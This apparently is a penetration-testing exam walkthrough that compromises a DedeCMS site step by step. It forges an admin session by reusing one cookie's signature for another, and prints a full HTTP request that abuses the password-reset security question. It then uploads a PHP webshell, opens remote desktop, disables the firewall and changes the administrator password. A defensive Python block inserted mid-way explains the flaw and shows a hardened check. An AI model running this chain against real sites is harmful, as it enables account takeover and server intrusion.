
True unfreedom is the cage one builds in one's own heart.

PTE practical: dedecms

The target runs dedecms; its backend login page is the starting point.

Directory scanning and robots.txt turned up nothing useful to exploit.

After trying weak passwords on the backend login, register a front-end account with username 0001 and password 111111, leaving the security questions blank.

Once registration succeeds, visit http://10.1.10.62/member/index.php?uid=0001; the member page for that uid comes up.

Press F12 to inspect the page and copy the value of the last_vid__ckMd5 cookie.

With last_vid__ckMd5 copied, log in to the 0001 account.

Open Cookies Manager and search for the site's IP address.

Replace the value of DedeUserID__ckMd5 with the value copied earlier (the original value differs from the copied one).

Then change DedeUserID to 0001. With both values modified, click Refresh and close the manager.

Refresh, and then it becomes the admin user.
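Why this cookie swap works, and what a fixed check looks like, as an added example (not code from dedecms or from the original post). The "weak" signer below is a simplified model of the pattern the walkthrough relies on, an assumption rather than the project's source: a 16-hex-character digest computed over the cookie value alone and shared by every cookie name, which is why last_vid__ckMd5 and DedeUserID__ckMd5 in the request above carry the same tag for the same value 0001. The hardened form binds the tag to the cookie name and accepts only the canonical decimal form of an id, and the last function is a server-side log check that flags non-canonical ids in a Cookie header. The secret and the sample cookie jars are constructed for the demo.

```python
"""Cookie-integrity check: the pattern the walkthrough abuses, beside a hardened form."""
import hashlib
import hmac
from typing import Dict, List, Optional

SECRET = b"constructed-demo-secret"  # stands in for the site's cookie key (constructed)

# Cookie header from the request in the walkthrough; only used by the log check below.
SAMPLE_COOKIE_HEADER = (
    "PHPSESSID=7670a8ebb1cda24bd2e5ca30dc7a583d; DedeUserID=0001; "
    "DedeUserID__ckMd5=6ce7088fae0207fd; DedeLoginTime=1689920383; "
    "DedeLoginTime__ckMd5=41803202759b8e30; last_vtime=1689920439; "
    "last_vtime__ckMd5=46f2d368c54edcb0; last_vid=0001; last_vid__ckMd5=6ce7088fae0207fd"
)


def weak_tag(value: str) -> str:
    """Assumed weak model: tag over the VALUE only, md5(secret + value) cut to 16 hex chars."""
    return hashlib.md5(SECRET + value.encode()).hexdigest()[:16]


def weak_verify(cookies: Dict[str, str], name: str) -> Optional[str]:
    """Accepts any value whose tag matches, regardless of which cookie the tag was minted for."""
    tag = cookies.get(name + "__ckMd5", "")
    value = cookies.get(name, "")
    return value if hmac.compare_digest(tag, weak_tag(value)) else None


def hardened_tag(name: str, value: str) -> str:
    """HMAC-SHA256 over name and value: a tag minted for last_vid is useless for DedeUserID."""
    msg = name.encode() + b"\x00" + value.encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()


def canonical_id(value: str) -> bool:
    """Only the canonical decimal form of a positive integer id passes ("0001" does not)."""
    return value.isdigit() and str(int(value)) == value and int(value) > 0


def hardened_verify(cookies: Dict[str, str], name: str) -> Optional[str]:
    """Reject non-canonical ids, then check the name-bound tag in constant time."""
    tag = cookies.get(name + "__ckMd5", "")
    value = cookies.get(name, "")
    if not canonical_id(value):
        return None
    if not hmac.compare_digest(tag, hardened_tag(name, value)):
        return None
    return value


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Split a raw Cookie header into a name -> value dict."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            key, val = part.strip().split("=", 1)
            cookies[key] = val
    return cookies


def suspicious_cookie_findings(header: str) -> List[str]:
    """Log check: member ids that are not in canonical decimal form."""
    cookies = parse_cookie_header(header)
    findings = []
    for name in ("DedeUserID", "last_vid"):
        value = cookies.get(name)
        if value is not None and not canonical_id(value):
            findings.append("non-canonical %s: %s" % (name, value))
    return findings


def demo() -> Dict[str, Optional[str]]:
    """Replay the swap from the walkthrough against both verifiers (constructed jars)."""
    # Viewing profile 0001 makes the server mint a tag for last_vid=0001 ...
    leaked = weak_tag("0001")
    # ... which is then reused as the tag for the identity cookie.
    forged = {"DedeUserID": "0001", "DedeUserID__ckMd5": leaked,
              "last_vid": "0001", "last_vid__ckMd5": leaked}
    # Same move against name-bound tags with a canonical value.
    swapped = {"last_vid": "1", "last_vid__ckMd5": hardened_tag("last_vid", "1")}
    swapped.update(DedeUserID="1", DedeUserID__ckMd5=swapped["last_vid__ckMd5"])
    own = {"DedeUserID": "7", "DedeUserID__ckMd5": hardened_tag("DedeUserID", "7")}
    return {
        "weak_accepts_forged": weak_verify(forged, "DedeUserID"),
        "hardened_rejects_noncanonical": hardened_verify(forged, "DedeUserID"),
        "hardened_rejects_name_swap": hardened_verify(swapped, "DedeUserID"),
        "hardened_accepts_own": hardened_verify(own, "DedeUserID"),
    }


if __name__ == "__main__":
    print(demo())
    print(suspicious_cookie_findings(SAMPLE_COOKIE_HEADER))
```

The two properties that matter are independent: binding the name stops one cookie's tag from authenticating another, and insisting on the canonical form stops "0001" from being accepted as a signed value and later read as id 1.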


Visit http://10.1.10.62/member/resetpassword.php and send the following package using Burp.

POST /member/resetpassword.php HTTP/1.1
Host: 10.1.10.62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7670a8ebb1cda24bd2e5ca30dc7a583d; DedeUserID=0001; DedeUserID__ckMd5=6ce7088fae0207fd; DedeLoginTime=1689920383; DedeLoginTime__ckMd5=41803202759b8e30; last_vtime=1689920439; last_vtime__ckMd5=46f2d368c54edcb0; last_vid=0001; last_vid__ckMd5=6ce7088fae0207fd; ENV_GOBACK_URL=%2Fmember%2Fcontent_list.php%3Fchannelid%3D1
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

dopost=safequestion&safequestion=0.0&safeanswer=&id=1


Note the reset link in the response body and copy it. In the response its parameter separators are HTML-encoded (&amp;); replace them with a plain & to get:

http://10.1.10.62/member/resetpassword.php?dopost=getpasswd&id=1&key=H1nWnhNM

Open it in a browser; it leads straight to the password change page.

Set the password to 666666.

That is the front-end password for the admin user; the backend password for the same username still has to be changed.

Visit

http://10.1.10.62/member/edit_baseinfo.php

You are redirected to the profile completion page; just click "Complete Registration".

Visit http://10.1.10.62/member/edit_baseinfo.php again; this time the profile edit page loads.

Enter 666666 as the current password and 888888 as the new one, fill in the captcha and e-mail, and the update succeeds.

Go to the backend and log in with admin/888888; the login succeeds.

Next, upload a shell through the backend.

Go to the file manager and create a new file.

Name the file s.php and write a shell into it.

Connect with AntSword using the base64 encoder.

If port 3389 is not open, upload the vbs script from the tool package to open it.

Turn off the firewall.

Change the administrator password.

Log in over remote desktop.